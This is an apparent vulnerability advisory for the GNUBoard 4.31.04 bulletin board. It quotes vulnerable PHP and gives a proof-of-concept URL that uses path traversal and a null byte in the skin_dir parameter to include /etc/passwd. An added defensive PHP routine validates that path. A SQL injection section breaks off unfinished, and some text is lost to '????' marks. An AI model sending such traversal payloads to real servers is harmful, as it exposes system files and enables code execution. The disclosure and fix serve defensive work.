# Title : GNUBoard 4.31.04 (09.01.30) Multiple Local/Remote Vulnerabilities
# Published : 2009-01-30
# Author : make0day
GNUBoard V4.31.04 (09.01.30) Multiple Local/Remote Vulnerabilities
by make0day@gmail.com
/*************************
SIR GNUBoard (version 4.31.04 (09.01.30)) is a bulletin board system widely used in Korea.
It is freely available for all platforms that support PHP and MySQL.
We found a file include vulnerability that affects SIR GNUBoard.
Under special conditions, it may be usable as a remote file include vulnerability.
This issue can be used to execute arbitrary PHP code on an affected computer with the privileges of the affected Web server.
Here are the details:
**************************/
TESTED ON VERSION 4.31.04 (08.01.30)
/***************************
Local File Inclusion Vulnerability
/poll_result.php
include_once("./_common.php");
$po = sql_fetch(" select * from $g4[poll_table] where po_id = '$po_id' ");
if (!$po[po_id])
????????
echo "<script language='javascript' src='$g4[path]/js/sideview.js'></script>";
if (!$skin_dir) $skin_dir = "basic";
$poll_skin_path = "$g4[path]/skin/poll/$skin_dir";
include_once ("$poll_skin_path/poll_result.skin.php"); //file include
*************************/
poc:
http://test.com/GnuBoard/bbs/poll_result.php?po_id=177&skin_dir=../../../../../../../../etc/passwd%00
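The excerpt above concatenates the request-supplied skin_dir straight into the include_once path. The following is an added example, not GNUBoard's own code or the author's fix, showing one way to constrain that value before including the skin; the function name resolve_poll_skin() and the $skinRoot argument are assumptions made for this sketch.

```php
<?php
// Added example, not GNUBoard's own code. resolve_poll_skin() and the
// $skinRoot argument are hypothetical names chosen for this sketch.
function resolve_poll_skin(string $skinRoot, ?string $skinDir): string
{
    $default = 'basic';
    if ($skinDir === null || $skinDir === '') {
        $skinDir = $default;
    }
    // 1. Allowlist the shape: one directory name, so no "/", "..", or NUL byte.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $skinDir)) {
        $skinDir = $default;
    }
    // 2. Canonicalise and require the file to sit under the skin root.
    $root = realpath($skinRoot);
    $file = realpath("$skinRoot/$skinDir/poll_result.skin.php");
    if ($root === false || $file === false
        || strncmp($file, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        throw new RuntimeException('poll skin not found');
    }
    return $file;
}

// Constructed demo data: a throwaway skin tree with only the "basic" skin.
$tmp = sys_get_temp_dir() . '/poll_skin_demo_' . getmypid();
mkdir("$tmp/poll/basic", 0700, true);
file_put_contents("$tmp/poll/basic/poll_result.skin.php", "<?php // skin\n");

// Constructed inputs: default, valid name, traversal with NUL, unknown skin.
$inputs = [null, 'basic', "../../../../etc/passwd\0", 'no_such_skin'];
foreach ($inputs as $input) {
    try {
        $result = resolve_poll_skin("$tmp/poll", $input);
    } catch (RuntimeException $e) {
        $result = 'rejected: ' . $e->getMessage();
    }
    echo json_encode($input), ' => ', $result, PHP_EOL;
}

// Clean up the demo tree.
unlink("$tmp/poll/basic/poll_result.skin.php");
rmdir("$tmp/poll/basic");
rmdir("$tmp/poll");
rmdir($tmp);
```

In poll_result.php the include would then take the returned path, with the skin root passed as "$g4[path]/skin/poll". Malformed names fall back to the "basic" skin, and well-formed names that do not exist under the root are rejected.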
/***************************
SQL Injection Vulnerability
/register_form.skin.php
<?
if (!defined("_GNUBOARD_")) exit;
?>
<style type="text/css">
<!--
????????
function fregisterform_submit(f)
{
if (f.w.value == "") {
reg_mb_id_check();
if ($F('mb_id_enabled')!='000') {
alert('?????????????